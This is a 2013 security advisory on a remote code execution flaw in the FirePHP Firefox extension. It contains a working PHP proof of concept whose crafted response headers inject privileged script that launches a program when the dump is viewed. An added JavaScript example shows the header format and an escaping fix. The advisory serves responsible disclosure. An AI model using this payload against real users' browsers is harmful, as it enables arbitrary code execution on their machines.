JAHx132 - FirePHP firefox plugin remote code execution

--------------------------------------------------------------------------------------------
20130417 - Justanotherhacker.com : FirePHP firefox plugin remote code execution
JAHx132 - http://www.justanotherhacker.com/advisories/JAHx132.txt
--------------------------------------------------------------------------------------------

FirePHP enables you to log to your Firebug Console using a simple PHP method call.
All data is sent via response headers and will not interfere with the content on your page.
FirePHP is ideally suited for AJAX development where clean JSON and XML responses are required.
[ Taken from: http://www.firephp.org/ ]


--- Vulnerability description ---
The extension does not sufficiently validate cell names in array data received from the remote
host, resulting in arbitrary script execution in the chrome-privileged context if a user
inspects the malicious data in FirePHP.

Discovered by: Eldar "Wireghoul" Marcussen
Type: Remote Code Execution
Severity: High
Release: Responsible
Vendor: FirePHP - http://www.firephp.org/
Affected versions: All versions prior to 0.7.2


--- Proof of Concept ---
<?php
/*************************************************************
 * FirePHP Firefox plugin Remote code execution PoC          *
 * Written by Wireghoul - http://www.justanotherhacker.com   *
 * Greetz to @bcoles urbanadventurer @malerisch              *
 *************************************************************/

// XUL code to launch calc.exe
$exploit =  '{"RequestHeaders":{"1":"1","2":"2","3":"3","4":"4","5":"5","6":"6","7":"7","8":"8","9":"9","UR<script>';
$exploit.= 'var lFile=Components.classes[\"@mozilla.org/file/local;1\"].createInstance(Components.interfaces.nsILocalFile);';
$exploit.= 'lFile.initWithPath(\"C:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\calc.exe\");';
$exploit.= 'var process=Components.classes[\"@mozilla.org/process/util;1\"].createInstance(Components.interfaces.nsIProcess);';
$exploit.= 'process.init(lFile);';
$exploit.= 'process.run(true,[],0);void(0);';
$exploit.= '<\/SCRIPT>":"PWNT"}}';

// Send FirePHP dump data
header("X-Wf-Protocol-1: http://meta.wildfirehq.org/Protocol/JsonStream/0.2");
header("X-Wf-1-Plugin-1: http://meta.firephp.org/Wildfire/Plugin/FirePHP/Library-FirePHPCore/0.3");
header("X-Wf-1-Structure-1: http://meta.firephp.org/Wildfire/Structure/FirePHP/Dump/0.1");
$payload= "X-Wf-1-1-1-1: ";
$payload.= strlen($exploit).'|'.$exploit."|\r\n";
header($payload);
?>
<html>
<head>
  <title>FirePHP Firefox plugin RCE PoC</title>
</head>
<body>
PWNT!
</body>
</html>


--- Solution ---
Upgrade to version 0.7.2
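To show the shape of the bug and of its fix, here is an added example that is not part of the advisory and not FirePHP's own code: it parses a Wildfire message in the same `length|json|` form the PoC sends in the `X-Wf-1-1-1-1` header, then renders the dump twice, once with keys and values inserted verbatim (a hypothetical stand-in for the unvalidated behaviour, not the extension's actual code) and once through a renderer that escapes every key and value before it reaches markup. The function names, the key `<script>probe()</script>` and all other sample values are constructed for this example.

```javascript
// Wildfire JsonStream message body as carried in an X-Wf-1-1-1-1 header:
// "<length>|<json>|", where <length> is the byte length of <json> (the PoC
// builds it with PHP's strlen()). Hypothetical parser, not FirePHP's.
function parseWildfireMessage(headerValue) {
  const first = headerValue.indexOf('|');
  const last = headerValue.lastIndexOf('|');
  if (first < 1 || last <= first || last !== headerValue.length - 1) {
    throw new Error('malformed Wildfire message');
  }
  const declared = Number(headerValue.slice(0, first));
  const body = headerValue.slice(first + 1, last);
  if (!Number.isInteger(declared) || declared !== Buffer.byteLength(body, 'utf8')) {
    throw new Error('declared length does not match body');
  }
  const parsed = JSON.parse(body);
  if (parsed === null || typeof parsed !== 'object') {
    throw new Error('dump must be a JSON object');
  }
  return parsed;
}

// Escape the five characters that matter when text is placed into HTML.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;').replace(/</g, '&lt;').replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;').replace(/'/g, '&#39;');
}

// Render a dump as nested tables; `escape` decides how keys and values are
// treated on their way into the markup. Nested objects recurse.
function renderRows(obj, escape) {
  let html = '<table>';
  for (const [key, value] of Object.entries(obj)) {
    const cell = (value !== null && typeof value === 'object')
      ? renderRows(value, escape)
      : escape(value);
    html += `<tr><td>${escape(key)}</td><td>${cell}</td></tr>`;
  }
  return html + '</table>';
}
const renderUnsafe = (obj) => renderRows(obj, String);     // keys pasted raw: markup survives
const renderSafe = (obj) => renderRows(obj, escapeHtml);   // keys escaped: markup becomes text

// Constructed sample: a dump whose array cell name carries markup.
const SAMPLE_DUMP = {
  RequestHeaders: { Host: 'example.test', '<script>probe()</script>': 'PWNT' },
};
const SAMPLE_JSON = JSON.stringify(SAMPLE_DUMP);
const SAMPLE_HEADER_VALUE = `${Buffer.byteLength(SAMPLE_JSON, 'utf8')}|${SAMPLE_JSON}|`;
```

Run under Node.js; the hardened renderer is the only one whose output for `SAMPLE_HEADER_VALUE` contains no `<script>` tag.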


--- Disclosure timeline ---
17-Apr-2013 - Public disclosure
17-Apr-2013 - New version available via Mozilla Add-ons
12-Apr-2013 - New version
12-Apr-2013 - Vendor acknowledged vulnerability
09-Apr-2013 - Vendor notified through email


This weblog is licensed under a Creative Commons License.